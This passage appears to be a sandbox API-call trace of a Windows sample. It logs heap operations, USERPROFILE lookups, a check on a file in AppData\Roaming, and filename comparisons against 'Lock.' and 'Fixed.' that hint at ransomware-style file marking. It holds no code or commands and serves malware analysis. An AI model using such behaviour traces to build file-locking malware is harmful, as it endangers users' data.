[0122.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0122.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0122.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0122.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0122.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0122.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0122.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0122.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0122.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0122.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0122.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0122.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0122.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0122.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0122.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0122.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0122.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0122.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0122.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0122.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0122.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0122.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0122.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0122.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0122.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0122.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0122.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0122.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0122.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0122.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0122.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0122.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0122.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0122.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0122.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0122.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0122.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x58) returned 0x2a5fa20 [0122.967] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/lNMKqFE.odt", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\lNMKqFE.odt", lpFilePart=0x8cf650*="lNMKqFE.odt") returned 0x2b [0122.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5fa20 | out: hHeap=0x2af0000) returned 1 [0122.967] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\lNMKqFE.odt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lnmkqfe.odt")) returned 0xffffffff [0122.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0122.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0122.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0122.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0122.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0122.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0122.968] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0122.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0122.968] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0122.968] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0122.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0122.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0122.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0122.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0122.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0122.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0122.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0122.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0122.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0122.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0122.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0122.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0122.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0122.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m3JGHdzSozsPviDT.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0122.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3JGHdzSozsPviDT.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0122.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JGHdzSozsPviDT.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0122.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GHdzSozsPviDT.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0122.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HdzSozsPviDT.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0122.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dzSozsPviDT.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0122.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zSozsPviDT.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0122.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SozsPviDT.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0122.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ozsPviDT.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0122.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zsPviDT.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0122.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sPviDT.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0122.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PviDT.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0122.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="viDT.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0122.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iDT.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0122.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DT.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0122.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0122.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0122.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0122.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0122.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0122.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0122.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0122.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0122.969] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0122.969] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0122.969] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0122.969] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0122.969] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0122.969] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0122.969] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0122.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0122.969] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0122.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0122.969] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0122.969] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0122.969] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0122.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0122.969] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0122.969] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0122.969] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0122.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0122.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0122.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0122.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x2a) returned 0x2aa66f0 [0122.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0122.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m3JGHdzSozsPviDT.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0122.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3JGHdzSozsPviDT.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0122.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JGHdzSozsPviDT.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0122.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GHdzSozsPviDT.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0122.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HdzSozsPviDT.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0122.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dzSozsPviDT.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0122.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zSozsPviDT.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0122.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SozsPviDT.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0122.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ozsPviDT.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0122.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zsPviDT.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0122.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sPviDT.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0122.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PviDT.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0122.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="viDT.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0122.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iDT.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0122.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DT.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0122.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0122.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6728 [0122.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0122.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6728 | out: hHeap=0x2af0000) returned 1 [0122.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0122.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0122.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0122.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0122.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0122.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0122.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0122.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0122.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0122.971] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0122.971] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0122.971] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0122.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0122.971] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0122.971] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0122.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0122.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0122.971] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0122.971] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0122.971] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0122.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0122.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72208 [0122.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0122.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0122.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0122.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0122.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0122.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0122.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0122.971] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0122.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0122.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0122.971] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0122.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0122.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0122.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9268 [0122.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0122.971] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0122.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa90e8 [0122.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0122.972] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0122.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0122.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0122.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0122.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0122.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0122.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0122.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0122.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0122.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0122.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0122.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0122.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0122.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0122.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0122.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0122.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0122.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0122.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0122.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0122.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0122.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0122.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0122.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0122.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0122.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0122.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0122.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722f8 [0122.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0122.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0122.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0122.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0122.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0122.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0122.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0122.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0122.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0122.973] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0122.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0122.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0122.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa90e8 [0122.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0122.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0122.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9298 [0122.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0122.973] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0122.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0122.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0122.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0122.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0122.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0122.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0122.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0122.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0122.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: 